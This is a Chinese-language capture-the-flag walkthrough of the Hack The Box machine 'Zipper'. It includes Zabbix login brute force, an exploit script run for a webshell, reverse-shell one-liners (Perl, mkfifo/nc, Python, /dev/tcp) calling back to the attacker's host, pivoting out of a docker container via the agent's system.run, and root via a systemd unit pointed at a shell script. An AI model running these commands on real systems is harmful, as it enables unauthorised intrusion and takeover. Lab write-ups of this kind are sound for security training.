zipper docker容器靶机渗透

你越功利,世界对你越神秘。废话不说,开始紧张刺激的渗透吧!

scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
22/tcp    open  ssh        OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 
|   2048 59:20:a3:a0:98:f2:a7:14:1e:08:e0:9b:81:72:99:0e (RSA)
|   256 aa:fe:25:f8:21:24:7c:fc:b5:4b:5f:05:24:69:4c:76 (ECDSA)
|_  256 89:28:37:e2:b6:cc:d5:80:38:1f:b2:6a:3a:c3:a1:84 (ED25519)

80/tcp    open  http       Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

10050/tcp open  tcpwrapped
2048/udp open|filtered dls-monitor no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

以上结果说明ssh、web以及其他不明2端口开放,需要进一步做探测。
---
nc 10.10.10.108 10050
结果没有任何提示或者报错,说明端口开放
---
于是进行版本扫描
nmap 10.10.10.108 -p 10050
10050/tcp open  zabbix-agent
---
2048端口扫描结果,提示端口关闭,于是忽略

enumeration

ssh

1
2
3
4
5
6
ssh root@10.10.10.108
The authenticity of host '10.10.10.108 (10.10.10.108)' can't be established.
ECDSA key fingerprint is SHA256:cAmAZhj4I2L8r8N7/lMousEpdqK/HoeuU6zUIbGcdHs.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.108' (ECDSA) to the list of known hosts.
root@10.10.10.108: Permission denied (publickey).

拒绝密码连接,要么通过web获取到id_rsa通过私钥连接;要么web远程代码执行获得webshell,再提权。

web

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
wget http://10.10.10.108
---
gobuster -u http://10.10.10.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
/zabbix (Status: 301)
/server-status (Status: 403)

---
burp spider
http://10.10.10.108/zabbix/history.php
Zabbix 3.0.21
---
Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution 
searchsploit -m exploits/php/webapps/39937.py
1. 修改exp地址为http://10.10.10.108/zabbix
2. 运行exp:  python 39937.py 
3. 运行出错,检查exp
[zabbix_cmd]>>:  
Result of last command:
Traceback (most recent call last):
  File "39937.py", line 55, in <module>
    "auth" : auth['result'],
KeyError: 'result'
用户名密码Admin/zabbix可能是无效口令,尝试登陆后的确失败
4. http://10.10.10.108/zabbix/api_jsonrpc.php该地址存在
5. burp截包,尝试弱密码猜测
name=Admin&password=zabbix&autologin=1&enter=Sign+in

hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/3000-pass.txt -f 10.10.10.108 http-post-form "/zabbix/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:incorrect"

msf 尝试exploit/unix/misc/zabbix_agent_exec
ip/端口10050,失败

Zabbix Agent - ‘net.tcp.listen’ Command Injection (Metasploit)
Zabbix Server 2.4.X

CVE-2016-10134
before 3.0.4 allows remote attackers to execute arbitrary SQL commands
auxiliary/gather/zabbix_toggleids_sqli
失败

发现一个登陆表单,searchsploit zabbix,常规操作

10050 port

http://10.10.10.108:10050
searchsploit zabbix
Zabbix Agent - ‘net.tcp.listen’ Command Injection (Metasploit)

use exploit/linux/misc/zabbix_server_exec
use exploit/unix/misc/zabbix_agent_exec

writeup

log in as guest,在主页面发现了一个用户名Zipper,仔细查找网页内容,把zapper、Zipper、zipper添加到字典中进行爆破

拿到服务器参数

通过官网获得api使用方法:https://www.zabbix.com/documentation/3.0/manual/api

1
2
3
curl -i -X POST -H 'Content-type:application/json' -d '{"jsonrpc":"2.0","method":"user.login","params":{ "user":"zapper","password":"zapper"},"auth":null,"id":0}' http://10.10.10.108/zabbix/api_jsonrpc.php
---
curl -i -X POST -H 'Content-type:application/json' -d '{"jsonrpc":"2.0","method":"host.get","params":{ "output": ["hostid","host"],"selectInterfaces":["interfaceid","ip"] },"auth":"注意修改这里的hash是通过上一条命令得到的","id":0}' http://10.10.10.108/zabbix/api_jsonrpc.php

修改exp并执行

通过api,查询到服务器参数,然后修改exp

1
2
3
4
5
6
7
8
searchsploit -m exploits/hp/webapps/39937.py

ZABIX_ROOT = 'http://10.10.10.108/zabbix'	### Zabbix IP-address
login = 'zapper'		### Zabbix login
password = 'zapper'	### Zabbix password
hostid = '10105'	### Zabbix hostid

python 39937.py 即可拿到webshell

反弹docker虚拟机的shell到本地

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
参考pentestmonkey的reverse shell
反弹shell到本地。

nc -lnvp 1234
首先本地监听1234端口
---
webshell执行以下命令
方法一:perl -e 'use Socket;$i="10.10.14.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

方法二:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f
---
python -c 'import pty;pty.spawn("/bin/bash")'
反弹standard shell失败,没有找到python
---
SHELL=/bin/bash script -q /dev/null
获得startard tty
---
find / -name "*.txt" 2>/dev/null
本意是查找user.txt

结果显示了一个web的路径。
/usr/share/zabbix/robots.txt

cat /usr/share/zabbix/conf/zabbix.conf.php

$DB['TYPE']     = 'MYSQL';
$DB['SERVER']   = 'localhost';
$DB['PORT']     = '0';
$DB['DATABASE'] = 'zabbixdb';
$DB['USER']     = 'zabbix';
$DB['PASSWORD'] = 'f.YMeMd$pTbpY3-449';

mysql -u zabbix -p 
f.YMeMd$pTbpY3-449     #输入密码
页面提示
ERROR 1044 (42000): Access denied for user 'zabbix'@'localhost' to database 'f.YMeMd-449mysql'
连接失败
---
ls -al /
-rwxr-xr-x   1 root root    0 Sep 30 21:33 .dockerenv
发现一个docker目录,说明可能是虚拟机容器

反弹10.10.10.108的shell到本机

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         172.17.0.1      0.0.0.0         UG        0 0          0 eth0
172.17.0.0      0.0.0.0         255.255.0.0     U         0 0          0 eth0
查看路由表
---
ifconfig,本地ip为172.17.0.2
---
nc -nv 172.17.0.1 10050
用nc扫描网关的的10050端口,为open状态
---
echo system.run[ ifconfig ] | nc 172.17.0.1 10050
通过zabbix server system.run的系统特性,可以进行命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
echo system.run[ nc -e /bin/bash 10.10.14.10 1235 ] | nc 172.17.0.1 10050
提示nc没有-e参数
---
echo system.run[ perl -e 'use Socket;$i="10.10.14.10";$p=1235;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ] | nc 172.17.0.1 10050
提示ZBXD)ZBX_NOTSUPPORTEDInvalid item key format.
---
echo system.run[ whereis python ] | nc 172.17.0.1 10050
echo system.run[ /usr/bin/python3.6 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ] | nc 172.17.0.1 10050

ZBXD)ZBX_NOTSUPPORTEDInvalid item key format.
连接失败
---
echo system.run[ nc 10.10.14.10 1235 ] | nc 172.17.0.1 10050
成功连接
---
echo system.run[ /bin/sh -i >& /dev/tcp/10.10.14.10/1235 0>&1 ] | nc 172.17.0.1 10050

echo system.run[ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1235 >/tmp/f ] | nc 172.17.0.1 10050
成功反弹172.10.0.1的/bin/sh到本地
连上了是连上了,但总是会掉线
---
本机监听nc -lnvp 1234
echo "system.run[(/bin/bash -c 'bash -i >/dev/tcp/10.10.14.10/1234 0<&1 2>&1 &')]" | nc 172.17.0.1 10050
连上了

提权

cd /home/zapper/utils

通过backup.sh得到zapper用户密码。切换用户。

cat /home/zapper/.ssh/id_rsa

获得ssh密钥。通过ssh -i id_rsa 用户名@IP

登陆后, /home/zapper/utils/zabbix-service具有suid权限

之前文章讨论过很多suid的东西了,这里就不多说了。

在/tmp目录添加shell,命令如下

1
2
3
echo '#!/bin/bash ' > /tmp/shell.sh
echo 'bash -i >/dev/tcp/10.10.14.10/443 0<&1' >> /tmp/shell.sh
chmod a+x /tmp/shell.sh

在zapper配置中修改重启后运行的脚本,如果以下命令报错,可以手动修改该行。目的是重启程序,同时执行/tmp/shell.sh

1
2
3
4
5
6
7
8
sed -i 's/ExecStart=\/root\/scripts\/purge-backups.sh/ExecStart=\/tmp\/shell.sh/' /etc/systemd/system/purge-backups.service

cd /home/zapper/utils;./zabbix-service
stop

nc -lnvp 443开启监听

再次运行,start开启该服务,即可得到root权限

存在的漏洞

1
2
3
4
5
6
guest匿名登陆+信息泄露
弱密码
web api可访问,用来爆破登陆口令
zabbix-agentweb版本漏洞-远程代码执行
zabbix-server system.run远程代码执行
suid提权

总结

  1. 当遇到openbsd需要反弹shell的时候,nc -e没有这个参数。
    可以用命令rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

  2. 拿到webshell后。cd到用户家目录,查找.ssh目录,查找id_rsa文件。拿到该文件可以通过ssh获得稳定的shell,避免掉线后重连的麻烦